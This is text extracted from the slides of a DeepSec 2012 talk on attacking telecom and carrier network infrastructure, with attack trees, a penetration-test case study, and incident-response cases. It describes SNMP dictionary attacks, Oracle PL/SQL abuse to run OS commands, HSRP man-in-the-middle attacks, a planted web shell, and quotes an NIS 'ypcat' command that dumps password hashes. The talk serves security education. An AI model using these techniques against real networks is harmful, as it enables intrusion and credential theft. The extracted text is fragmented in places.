illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit (DeepSEC 2015)
DeepSec 2012 Own the Network – Own the Data · Presentation Session Transport Network Data Link...
Transcript of DeepSec 2012 Own the Network – Own the Data · Presentation Session Transport Network Data Link...
www.dynetics.com
Information Engineering Solutions
DeepSec 2012
Own the Network – Own the Data Paul Coggin
Internetwork Consulting Solutions Architect [email protected]
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
2 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Introduction
• Network Security Architect – 18 Years experience • BS Math, MS Computer Informa@on Systems, Graduate Studies in IA & Security • Cer@fica@ons: Cisco, ISC^2, EC-‐Council • Cisco and EC-‐Council Instructor • U@li@es, Telecommunica@ons and Service Provider Experience -‐ Transport: Op@cal(DWDM, SONET), MPLS, 10G Ethernet -‐ Triple Play Services: Voice, IPTV -‐ OSS and Network Management -‐ Access Networks: HFC Cable, DSL, FTTX, Wireless, ATM, Frame Relay -‐ Security: Penetra@on Tes@ng, Network Security Architecture, Vulnerability Analysis -‐ Rou@ng and Switching
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
3 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Hub & SpokeSONET/SDH Ring
Network Management
GE Ring
Application Services
Residential
Branch Office
L3VPN-PE
MPLS/IP P
Internet P
Video Headend IPTV/VOD
SIP Proxy
L3VPN-PE L3VPN-PE
Residential Telecommuter
SOHO Energy Distribution
DSL
or F
iber
E
dge
CE
M
etro
Acc
ess/
A
ggre
gatio
n E
dge
Cor
e
Provisioning Servers
Assurance Servers
Billing Servers
Next Generation Network Architecture
Water / Sewer Treatment Plant
U-PE/ PE-AGG
Web server
VoIP GW
Si Si
Si Si
Si Si Si Si
Si Si
Enterprise
Policy & Control PlaneBRAS/ISG
Con
trol
/App
licat
ions
/
N
MS
Policy Server
DHCP Server
AAA Server Lawful
Intercept
SCE
ICS / SCADA
Cell Tower
DWDM
Situational Awareness Servers
Data Service Voice Service Video Service
Insertion Point Smart Grid
Demand for Bandwidth driving Optical Network Growth; Telcos, …
Triple Play and Smart Grid Service
TCP\IP Wire Tap
Cellular Mobile IP Backhaul
Carrier Class Telco Networks 10 Gig, Highly Redundant
Thousands Of Devices
Internet to customer premise automation
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
4 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Transport Networks
IP+Optical
• IP MPLS based network services over DWDM • IP Services over SONET • Legacy TDM Services over SONET • Cell Tower T1 Backhaul to Support 3G and 4G Router Router
Management Plane
The equipment in each layer of the transport network has it’s own network element management system with trust relationships and interdependencies. - Routing protocols - Inband\Out of band management - Provisioning - Control\Management\Data planes to secure
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
5 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Cyber Attack Model
OSI Model
7
6
5
4
3
2
1
Application
Presentation
Session
Transport
Network
Data Link
Physical
TCP/IP Model
Network Interface
Application
Transport
Internet
MITM (Intercept, Modify),
DoS, RF (Jam, Replay)
Session Hijacking and Spoofing (Intercept, Modify, Bypass Network
Security), DoS
Malware, OS and Application level; Remote and Privilege Escalation
exploits, Bots, Phishing
RF, Fiber, Copper
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
6 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
IP Transport Cyber Attack Vectors
Network and System Architecture -‐ Centralized, Distributed, Redundant -‐ Physical and Logical
Transport Network -‐ RF, Fiber, Copper
Network Protocols -‐ Rou@ng, Switching, Redundancy -‐ Apps, Client/Server
Client\Server Architecture HW, SW, Apps, RDBMS -‐ Open Source -‐ Commercial
Trust RelaHonships -‐ Network Management and Network Devices -‐ Billing, Middleware, Provisioning
Common HW/SW configura@on se`ngs
Network InfrastructureAttack Vectors
SNMP Community String Dictionary Attack
with Spoofing to Download Router\
Switch Configuration
Build New Router Configuration File to
enable further privilege escation
Upload New Configuration File
Using Comprimised SNMP RW String
UNIX NetMgt Server Running NIS v1
Ypcat -d <domain> <server IP> passwd Grab shadow file hashes
Crack Passwords
Access Server Directly
Exploit ACL Trust
RelationshipAttack SNMP\Telnet\SSH
Find NetMgt
passwords and SNMP config files
Discover Backup HW Configs
Crack Passwords
HP OpenView ServerEnumerate Oracle
TNS Listener to Identify Default SID’s
Further Enumerate Oracle SID’s to Identify Default
DBA System Level Accts\Passwords
Login to Oracle DB with Discovered DBA
Privilege Account
Run Oracle SQL CMDs
Execute OS CMDs Add New
Privileged OS Account
Crack Passwords
Further Enumerate Oracle SID’s to
Identify User Accts.
Perform Dictionary Attack
Execute OS CMDs from Oracle PL/SQL
Attack Network from DB
Run Oracle SQL CMDs Execute OS CMDs
Find NetMgt Passwords, SNMP info, OS password
files
Network Mgt Application
Attempt to Login Using Default Login\Password
Reconfigure Router or Switch
MITM ARP Poisoning
Sniffing
Capture SNMP Community Strings and Unencrypted
Login\Passwords, Protocol Passwords
Configure Device for
Further Privilege
Escalation
Telnet\SSHDictionary Attack Router\Switches\NetMgt Server
Inject New RoutesOr Bogus Protocol
Packets
Use New Privileged OS account to
Escalate Privileged Access to Network
Own Network Infrastructure
Own Network Infrastructure
Own Network Infrastructure
Own Network Infrastructure
Own Network Infrastructure
Own Network Infrastructure
Build New Router Configuration File to
enable further privilege escation
Transport Network Infrastructure Cyber Attack Tree
Attack Vectors - Deny, Disrupt, Delay, Intercept, Exploit Man in the Middle Attacks (MITM) Network Protocols IP Spoofing Apps / RDBMS / NetMgt Traffic Analysis
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
7 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
What Can You Do With a Router or Switch?
• Inject route prefixes to hide source of aback or enable a more complex MITM aback by cracing rou@ng protocol packets
• Configure Route Maps to forward traffic based on ACL criteria • Lawful Intercept – Forward a copy of interes@ng traffic using
CISCO-‐TAP-‐MIB, CISCO-‐TAP2-‐MIB, CISCO-‐IP-‐TAP-‐MIB • Span ports (port mirroring) to enhance packet capturing
capability • Review rou@ng tables to iden@fy key targets • DoS or MITM by cracing HSRP, rou@ng protocol, or spanning-‐
tree packets • Configure a router to be a DHCP server to create a MITM aback
vector
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
8 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Example Cyber Attack Exploiting Trust Relationship
Identified two target subnets and discovered product use with known
vulnerabilities *
Social networking & Career
sites
IP “whois” information
Search engines
Operating System Version
Detection
Port Scanning
Ping Sweeps
* Employee’s resume on the LinkedIn social networking site references training in specific product technologies
First Subnet – Directory Traversal
Exploit
• Installed web-based shell prompt to execute commands without log trail
• Enumerated internal network and services on 2000 hosts
Network Information
Services (NIS)
• After discovering NIS, ypcat command executed
• Dumped a list of all usernames and password hashes on the system
Second Subnet - Firewall
• https management interface for firewalls was accessible from public Internet
• Brute force password cracking could compromise system (did not perform)
Scans against common ports outside corporate networks were used to narrow down
targets of interest
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
9 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Oracle
• Oracle is commonly used with HP Openview for inventory management
• Default user account\passwords enabled and\or weak passwords typically found
• Un-‐secure RDMS -‐ Good as a un-‐patched MS NT 4.0 server • Open TNS listener \ SQL*NET listener • RDMS can be used for execu@ng OS shell commands • How about using the database and PL/SQL to aback the network?
The network infrastructure ACL’s trust the network management server IP address.
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
10 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Oracle Username Password Enumeration
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
11 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Oracle Password Dictionary Attack
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
12 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Run OS Commands From Oracle PL/SQL
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
13 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
http://phoenixlabs.org/pg2/faq/
Example of a Network Exploit Using Oracle PL/SQL
Run SNMPWALK utility against Cisco IOS device using SNMP read only community string Cisco routers and switches running IOS 12.0 thru 12.1 have a known vulnerability where if you know the
unprivileged read only SNMP community string you can obtain the privileged read\write string
TFTP upload SNMPWALK using Oracle PL/SQL
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
14 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
PL/SQL Query - SNMPWALK Results
http://phoenixlabs.org/pg2/faq/ SNMP Read\Write Community String
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
15 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
HSRP MITM – Packet Analysis
HSRP Password Clear Text
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
16 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
HSRP MITM – Packet Crafting
Routers
Rogue Insider Crafted HSRP coup packet with
higher priority
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
17 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Instrumentation
Secure Visualization and Instrumentation Enables Network Forensics
Root Cause Troubleshooting and Analysis
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
18 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Incident Response Network Forensics using SVI – Case #1
Multiple Routers / Service Gateways
On-‐Line Message Fail Network Power Ch Up
Ch Dn Select Guide Menu NLC 3 STB
PC
IPTV & Radio Services
Video On Demand Services
Voice Services
Private Virtual Circuits TV
IP Phone
Separation of Service/ VLANs
IP DSLAM
DSLCPEDSLCPE
Residential Customer
Internet Services
Example Carrier Class Network
Network Instrumentation Critical to Security
Deep Inspection and Monitoring of Network
Flows / Packets
• Foreign IP address attacked DSL Modem.
• Changed DNS address to Relay Box in US.
Bad Guy Relay Server • Hijacked web requests and
web traffic
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
19 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Incident Response Network Management Using SVI – Case #2
Multiple Routers / Service Gateways
On-‐Line Message Fail Network Power Ch Up
Ch Dn Select Guide Menu NLC 3 STB
PC
IPTV & Radio Services
Video On Demand Services
Voice Services
Private Virtual Circuits TV
IP Phone
Separation of Service/ VLANs
IP DSLAM
DSLCPEDSLCPE
Residential Customer
Internet Services
Example Carrier Class Network
Protocol and Logical Architecture Knowledge is Key
SVI -‐ Deep Inspec@on and Monitoring of Network
Flows / Packets
Customer Employee – mistakenly bridges Data and Video Networks
• Malware existed on Data (ISP) user computers – Malware sends ICMP packets to DOS target.
• Video equipment encapsulated DOS packets in all multicast groups. – sent to all video devices / users
• Customer with SVI was alerted to unusual traffic on multicast VLAN for video.
• Called for remote Incident Analysis/ Forensics on Network Packets showed multicasting of “bad Info” and misconfiguration of network logical data flows
UNCLASSIFIED
V100230_Faint
UNCLASSIFIED
20 UNCLASSIFIED 0000-00-yymm Information Engineering Solutions
Ques@ons?